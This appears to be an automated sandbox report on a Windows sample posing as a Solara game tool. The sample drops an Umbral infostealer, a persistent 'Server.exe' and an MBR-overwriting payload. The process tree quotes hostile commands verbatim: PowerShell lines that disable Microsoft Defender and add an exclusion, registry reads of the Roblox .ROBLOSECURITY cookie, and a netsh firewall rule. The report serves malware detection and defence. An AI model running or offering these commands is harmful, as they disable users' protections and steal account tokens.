Analysis

  • max time kernel
    78s
  • max time network
    88s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/04/2025, 15:37

Errors

Reason
Machine shutdown

General

  • Target

    N1NC5_solara.exe

  • Size

    2.8MB

  • MD5

    d4ef72e55ee8d916a060dae174398888

  • SHA1

    92dc6ce33833a32e70d377bd6d66a17c0fd2369a

  • SHA256

    852a0e2b6016d2b2e0953c50e0985fe60320a70e73515cfea7706f86130a06ca

  • SHA512

    a814c8a43b4602888c9f12969f96c83c193528a7679ee8432da8f8e4b11a1379e35c4b07ad6cedec5e434d0b5ec7ad8124bbd6f3092fbcd0acc1b98fbb144f16

  • SSDEEP

    49152:G5wRNpPAI7CYItONjnwsp61qLJa2uQzdqYoqDLdS96A4zDziq2EJLFp2C/Xv:GaRvROYEQEqFajKoqDLgMAI2KLmC/X

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\N1NC5_solara.exe
    "C:\Users\Admin\AppData\Local\Temp\N1NC5_solara.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3104
    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4960
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3504
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4144
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:1668
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1060
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:4188
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        2⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2752
        • C:\Users\Admin\AppData\Local\Temp\tmp6230.tmp.COM
          "C:\Users\Admin\AppData\Local\Temp\tmp6230.tmp.COM"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          PID:432
          • C:\Users\Admin\AppData\Local\Temp\MBR2.exe
            "C:\Users\Admin\AppData\Local\Temp\MBR2.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in System32 directory
            PID:3792
            • C:\Windows\System32\MatrixMBR.exe
              "C:\Windows\System32\MatrixMBR.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              PID:3612
              • C:\Users\Admin\AppData\Local\Temp\GDI.exe
                "C:\Users\Admin\AppData\Local\Temp\GDI.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:6000
              • C:\Users\Admin\AppData\Local\Temp\MBR.exe
                "C:\Users\Admin\AppData\Local\Temp\MBR.exe"
                6⤵
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
                • System Location Discovery: System Language Discovery
                PID:3152
          • C:\Users\Admin\AppData\Local\Temp\TROLL5.exe
            "C:\Users\Admin\AppData\Local\Temp\TROLL5.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:5268
          • C:\Users\Admin\AppData\Local\Temp\TROLL2.exe
            "C:\Users\Admin\AppData\Local\Temp\TROLL2.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3760
      • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        2⤵
        • Executes dropped EXE
        PID:2628
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5680
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5608
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5220
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1492
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4392
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2092
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:432
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3972
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4332
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5268
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4964
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:6000
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5300
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5168
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5004
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5812
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4808
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4468
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4648
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3940
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
        PID:4628
        • C:\Users\Admin\AppData\Local\Temp\Server.exe
          C:\Users\Admin\AppData\Local\Temp\Server.exe ..
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:5328
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
        1⤵
          PID:2456
          • C:\Users\Admin\AppData\Local\Temp\Server.exe
            C:\Users\Admin\AppData\Local\Temp\Server.exe ..
            2⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
          1⤵
            PID:5884
            • C:\Users\Admin\AppData\Local\Temp\Server.exe
              C:\Users\Admin\AppData\Local\Temp\Server.exe ..
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4376
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
            1⤵
              PID:400
              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3960
            • C:\Windows\system32\AUDIODG.EXE
              C:\Windows\system32\AUDIODG.EXE 0x338 0x33c
              1⤵
                PID:4496
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                1⤵
                  PID:5288
                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                    C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                    2⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:4316
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                  1⤵
                    PID:2908
                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                      C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:548

                  Network

                  MITRE ATT&CK Enterprise v16

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Server.exe.log

                    Filesize

                    319B

                    MD5

                    824ba7b7eed8b900a98dd25129c4cd83

                    SHA1

                    54478770b2158000ef365591d42977cb854453a1

                    SHA256

                    d182dd648c92e41cd62dccc65f130c07f0a96c03b32f907c3d1218e9aa5bda03

                    SHA512

                    ae4f3a9673711ecb6cc5d06874c587341d5094803923b53b6e982278fa64549d7acf866de165e23750facd55da556b6794c0d32f129f4087529c73acd4ffb11e

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    276798eeb29a49dc6e199768bc9c2e71

                    SHA1

                    5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                    SHA256

                    cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                    SHA512

                    0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    45ad40f012b09e141955482368549640

                    SHA1

                    3f9cd15875c1e397c3b2b5592805577ae88a96cb

                    SHA256

                    ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce

                    SHA512

                    3de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    944B

                    MD5

                    87d9fe9e5ee685ff2b66e5396fcdcb99

                    SHA1

                    0ac74edba86591b97d1a7531c3d2e659f0843b7f

                    SHA256

                    f84df996802a7b65b0a58ecd1960f157bdc82f817bae81409eb4184e438ed9b8

                    SHA512

                    ce602ffb6822849af961afc13b972d0d344bbfaa50c5fe372cf475f424a9227f788ea64a1dfa9b96d8e01cfa2b7f0f9e695ea001ea37a6c7c235c86931d1cf3e

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    948B

                    MD5

                    985b3105d8889886d6fd953575c54e08

                    SHA1

                    0f9a041240a344d82bac0a180520e7982c15f3cd

                    SHA256

                    5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

                    SHA512

                    0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

                  • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe

                    Filesize

                    3.4MB

                    MD5

                    07b2ed9af56f55a999156738b17848df

                    SHA1

                    960e507c0ef860080b573c4e11a76328c8831d08

                    SHA256

                    73427b83bd00a8745e5182d2cdb3727e654ae9af5e42befc45903027f6606597

                    SHA512

                    3a982d1130b41e6c01943eee7fa546c3da95360afdad03bff434b9211201c80f22bd8bf79d065180010bc0659ee1e71febbfd750320d95811ee26a54ee1b34c6

                  • C:\Users\Admin\AppData\Local\Temp\GDI.exe

                    Filesize

                    11KB

                    MD5

                    c08ae6d9c6ecd7e13f827bf68767785f

                    SHA1

                    e71c2ec8d00c1e82b8b07baee0688b0a28604454

                    SHA256

                    e153def894c867923dd56a7025b7b0b7bd3ee37c801a5957201d39f999bb28bf

                    SHA512

                    c28bbe8abc66ad2433e5a3b93a4601b28225e86cb4bff077fd3224adfa63164bebfa3002a42b1cb4cb3c7ccad0208f8b143b8a17099bea04fcb964e667c7a1c0

                  • C:\Users\Admin\AppData\Local\Temp\MBR.exe

                    Filesize

                    93KB

                    MD5

                    d2fc66cf781a2497fceb4041a93cc676

                    SHA1

                    480b1aa31b0b31fc0e0833afbba06533ab9a90ee

                    SHA256

                    acddde9514e3b9d5c40b3d1750af5f4187c99f8987b027d6da44fb6bcf79b3ca

                    SHA512

                    6c4cb42f786301be7614d4cb0b32601fea151351b0877e2371632435eb2c54bd4cd04d6b23bf4f49017ccaf679331162aac7329a1ed2409e3c2e02d0326e3487

                  • C:\Users\Admin\AppData\Local\Temp\MBR2.exe

                    Filesize

                    205KB

                    MD5

                    3dc0e225f886bae3b655cd9d738ed32f

                    SHA1

                    abda127fd477bd9d051cd57b16ac13f44030a9ae

                    SHA256

                    c22e2419f04fe03a92255a139ca8814697962e86d191a1d4171788fd0c903f68

                    SHA512

                    c8a6c0bfa96defde6f83d847583ff2ec065a43f80f9886259a2d1fe7df306ef6ed7aeed61b7dcf0bdc111fc67419eb66cf1ca44e831711dd4ea7d25ed9aed09b

                  • C:\Users\Admin\AppData\Local\Temp\Server.exe

                    Filesize

                    32KB

                    MD5

                    c30d7d561c7cd145687cfec82a8dc436

                    SHA1

                    6cd3cc34b5074a8b25a1d1b605d56ed9b0bc4203

                    SHA256

                    d467702296dbb5c5f84db6ffa8373684b429997c0ea3f1e2c88365250239bf01

                    SHA512

                    f8f1c5aaca62a20dd9342491a9d82571c8c280807dd61c9bd91d035436651115fce371bed4cab19af325b4b956b36fcd4ec93cccb433229438047947078260c8

                  • C:\Users\Admin\AppData\Local\Temp\TROLL2.exe

                    Filesize

                    105KB

                    MD5

                    52a2a5517deb1a06896891a35299ce20

                    SHA1

                    badcbdfef312bd71de997a7416ee20cee5d66af6

                    SHA256

                    dcdf5140bc51db27f3aec80ae9a66a57aad446a2522904d288770e8d8cde8cee

                    SHA512

                    7cb0de412c0508f5af522aeaf3731dda418f72f7cae8dd3f21b34d5cdbc08f9dea8699d59878610496c68d687227a0269739221490d70d03b8e4b84dfd29d5f1

                  • C:\Users\Admin\AppData\Local\Temp\TROLL5.exe

                    Filesize

                    712KB

                    MD5

                    542a4e400ff233b21a1a3c27751ac783

                    SHA1

                    000a67f00b0003531d65a6ed6f16488ae5dcd0fe

                    SHA256

                    79f00c7dab0891824136539fabd542c74e26cbed94b9add3f1aa7f793d653de6

                    SHA512

                    8335118ca0c268635d9495b331fb65800a32a0631f132cd34ce84ca3b523d0a9e23eee6d76539d0c81d86fda534da56c936914012d8bad35040b15cc8caaf645

                  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                    Filesize

                    231KB

                    MD5

                    edfc834a78aa9ffddb793cf2bd1e7aa1

                    SHA1

                    e5e559c15bffa95a233a6bcef428f5b51df71d90

                    SHA256

                    b8ccc05c96538a0c62b3a108f26c56c851027300eba900764d9ac1e0519f786c

                    SHA512

                    60456bedfd091fd7cd8a0f285d8e8634bde097a2b887f24e59173aab8d7335832dd9185608b693f9a4369eb4b750435cb6cd95f4b43dcf039580a23a51589b06

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnh1htgs.rx0.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\tmp6230.tmp.COM

                    Filesize

                    921KB

                    MD5

                    d0ae6aea701de9f127f91e7efdb50252

                    SHA1

                    cb9ef64cbcb999372fb4046e99fe89a03df9bc81

                    SHA256

                    c1aeab35f61f12db28274d82713bff400b808625854a18e49504022f92805e31

                    SHA512

                    505d11808e9923ff0ec1a51acd51509711f8c5c42da81b47a97249954b06f6f45ddda4655446daeb7f231785cd484ebc6e9ada92b857ad3a8d7ce04276536f13

                  • C:\Windows\System32\MatrixMBR.exe

                    Filesize

                    250KB

                    MD5

                    24c441662c09b94e14a4096a8e59c316

                    SHA1

                    11576cad137bd8ed76efecd711c0390fe5c85292

                    SHA256

                    339fe94164952a8454e6ec5fc75e2c38baade2c14b231e47bf41989ffbb55ee4

                    SHA512

                    7f6ca1366733c5fb4925001c0846510732031a9e5f1b16291ff596187c20a88f41193389cedcb73e3928c318fc972be4f03e3cb71f1487c34642897ff9a2b590

                  • memory/432-161-0x0000000000D60000-0x0000000000E4C000-memory.dmp

                    Filesize

                    944KB

                  • memory/432-162-0x000000001BB60000-0x000000001BC44000-memory.dmp

                    Filesize

                    912KB

                  • memory/2628-51-0x000001A6491D0000-0x000001A6491D8000-memory.dmp

                    Filesize

                    32KB

                  • memory/2628-56-0x000001A6491F0000-0x000001A6491FE000-memory.dmp

                    Filesize

                    56KB

                  • memory/2628-61-0x000001A665B00000-0x000001A665B16000-memory.dmp

                    Filesize

                    88KB

                  • memory/2628-63-0x000001A661A00000-0x000001A661A0A000-memory.dmp

                    Filesize

                    40KB

                  • memory/2628-64-0x000001A665B30000-0x000001A665B38000-memory.dmp

                    Filesize

                    32KB

                  • memory/2628-60-0x000001A661A20000-0x000001A661A28000-memory.dmp

                    Filesize

                    32KB

                  • memory/2628-59-0x000001A665AD0000-0x000001A665AF6000-memory.dmp

                    Filesize

                    152KB

                  • memory/2628-58-0x000001A6619F0000-0x000001A6619FA000-memory.dmp

                    Filesize

                    40KB

                  • memory/2628-57-0x000001A666990000-0x000001A666A90000-memory.dmp

                    Filesize

                    1024KB

                  • memory/2628-43-0x000001A648FA0000-0x000001A648FB0000-memory.dmp

                    Filesize

                    64KB

                  • memory/2628-62-0x000001A661A10000-0x000001A661A1A000-memory.dmp

                    Filesize

                    40KB

                  • memory/2628-40-0x000001A646FD0000-0x000001A647340000-memory.dmp

                    Filesize

                    3.4MB

                  • memory/2628-55-0x000001A665A90000-0x000001A665AC8000-memory.dmp

                    Filesize

                    224KB

                  • memory/3104-3-0x00007FFFF45F0000-0x00007FFFF50B1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3104-0-0x00007FFFF45F3000-0x00007FFFF45F5000-memory.dmp

                    Filesize

                    8KB

                  • memory/3104-42-0x00007FFFF45F0000-0x00007FFFF50B1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3104-1-0x0000000000BA0000-0x0000000000E78000-memory.dmp

                    Filesize

                    2.8MB

                  • memory/3612-220-0x0000000000EE0000-0x0000000000F26000-memory.dmp

                    Filesize

                    280KB

                  • memory/3760-208-0x0000000000400000-0x000000000041D000-memory.dmp

                    Filesize

                    116KB

                  • memory/3792-187-0x0000000000420000-0x000000000045A000-memory.dmp

                    Filesize

                    232KB

                  • memory/4332-49-0x0000016760360000-0x0000016760382000-memory.dmp

                    Filesize

                    136KB

                  • memory/4840-81-0x00000280AFA60000-0x00000280AFAB0000-memory.dmp

                    Filesize

                    320KB

                  • memory/4840-119-0x00000280AF7D0000-0x00000280AF7E2000-memory.dmp

                    Filesize

                    72KB

                  • memory/4840-80-0x00000280AFAE0000-0x00000280AFB56000-memory.dmp

                    Filesize

                    472KB

                  • memory/4840-37-0x00007FFFF45F0000-0x00007FFFF50B1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4840-137-0x00007FFFF45F0000-0x00007FFFF50B1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4840-24-0x00007FFFF45F0000-0x00007FFFF50B1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4840-82-0x0000028095760000-0x000002809577E000-memory.dmp

                    Filesize

                    120KB

                  • memory/4840-118-0x0000028095940000-0x000002809594A000-memory.dmp

                    Filesize

                    40KB

                  • memory/4840-22-0x0000028095300000-0x0000028095340000-memory.dmp

                    Filesize

                    256KB

                  • memory/4932-41-0x00000000010A0000-0x00000000010B0000-memory.dmp

                    Filesize

                    64KB

                  • memory/4932-141-0x00000000010A0000-0x00000000010B0000-memory.dmp

                    Filesize

                    64KB

                  • memory/5268-201-0x0000000004C50000-0x0000000004C5A000-memory.dmp

                    Filesize

                    40KB

                  • memory/5268-200-0x0000000004CA0000-0x0000000004D32000-memory.dmp

                    Filesize

                    584KB

                  • memory/5268-199-0x00000000051B0000-0x0000000005754000-memory.dmp

                    Filesize

                    5.6MB

                  • memory/5268-198-0x00000000001A0000-0x0000000000258000-memory.dmp

                    Filesize

                    736KB

                  • memory/6000-241-0x00000000003B0000-0x00000000003B8000-memory.dmp

                    Filesize

                    32KB